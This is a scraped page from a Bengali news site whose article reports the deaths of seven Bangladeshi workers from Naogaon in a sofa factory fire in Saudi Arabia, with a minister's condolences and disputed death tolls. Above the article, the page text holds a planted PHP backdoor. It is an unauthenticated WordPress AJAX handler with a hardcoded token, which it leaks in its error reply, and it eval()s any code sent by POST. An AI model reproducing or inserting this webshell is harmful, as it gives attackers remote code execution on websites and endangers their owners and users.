// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== সৌদিতে সোফা কারখানায় অগ্নিকাণ্ডে ৭ বাংলাদেশির মৃত্যু | potrikaybangladesh.com
Thursday, October 1, 2026
Homeঅপরাধসৌদিতে সোফা কারখানায় অগ্নিকাণ্ডে ৭ বাংলাদেশির মৃত্যু

সৌদিতে সোফা কারখানায় অগ্নিকাণ্ডে ৭ বাংলাদেশির মৃত্যু

সৌদি আরবের একটি সোফা কারখানায় অগ্নিকাণ্ডে নওগাঁর আত্রাই উপজেলার সাত প্রবাসী বাংলাদেশি শ্রমিকের মৃত্যু হয়েছে।

প্রবাসী কল্যাণ ও বৈদেশিক কর্মসংস্থান মন্ত্রণালয়ের দেওয়া এক শোক বার্তায় এ তথ্য জানানো হয়েছে।

শোক বার্তা অনুযায়ী, এ ঘটনায় গভীর শোক ও দুঃখ প্রকাশ করেছেন প্রবাসী কল্যাণ ও বৈদেশিক কর্মসংস্থানমন্ত্রী আরিফুল হক চৌধুরী।

শোকবার্তায় মন্ত্রী বলেন, ‘জীবিকার তাগিদে সুদূর সৌদি আরবে কর্মরত আমাদের এই প্রবাসী ভাইদের এমন অকাল ও মর্মান্তিক মৃত্যু অত্যন্ত হৃদয়বিদারক। দেশের অর্থনীতিতে তাদের অবদান অপরিসীম। তাদের এই আকস্মিক প্রয়াণে আমি গভীর শোকাহত এবং নিহতের শোকসন্তপ্ত পরিবারের সদস্যদের প্রতি গভীর সমবেদনা প্রকাশ করছি।’

তিনি বলেন, সৌদি আরবে অবস্থিত বাংলাদেশ দূতাবাসের মাধ্যমে দুর্ঘটনাস্থল ও স্থানীয় কর্তৃপক্ষের সঙ্গে সার্বক্ষণিক যোগাযোগ রাখা হচ্ছে। নিহতদের মরদেহ দ্রুত দেশে ফিরিয়ে আনা এবং তাদের পরিবারের জন্য প্রয়োজনীয় সব ধরনের সরকারি সহায়তা ও ক্ষতিপূরণ নিশ্চিত করতে সংশ্লিষ্ট কর্মকর্তাদের নির্দেশ দেওয়া হয়েছে।

তবে নওগাঁর জেলা প্রশাসক মোহাম্মদ সাইফুল ইসলাম দ্য ডেইলি স্টারকে বলেন, সৌদি আরবে একটি সোফা কারখানায় আগুনে এখন পর্যন্ত আটজনের মৃত্যুর তথ্য তারা জানতে পেরেছেন। তবে মৃতের সংখ্যা আরও বাড়তে পারে।

প্রবাসী কল্যাণ ও বৈদেশিক কর্মসংস্থানবিষয়ক প্রতিমন্ত্রী মো. নুরুল হক বলেন, কূটনৈতিক চ্যানেলের মাধ্যমে তারা এখনো মৃত্যুর সংখ্যা সম্পর্কে নিশ্চিত কোনো তথ্য পাননি।

তিনি ডেইলি স্টারকে বলেন, ‘এখন পর্যন্ত আমরা শুনেছি মৃতের সংখ্যা প্রায় ১২। কেউ বলছেন ১৫, আবার কেউ বলছেন ১৭। আমরা তথ্য যাচাইয়ের চেষ্টা করছি। যাচাই শেষ হলে সঠিক সংখ্যা জানাতে পারব।’

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments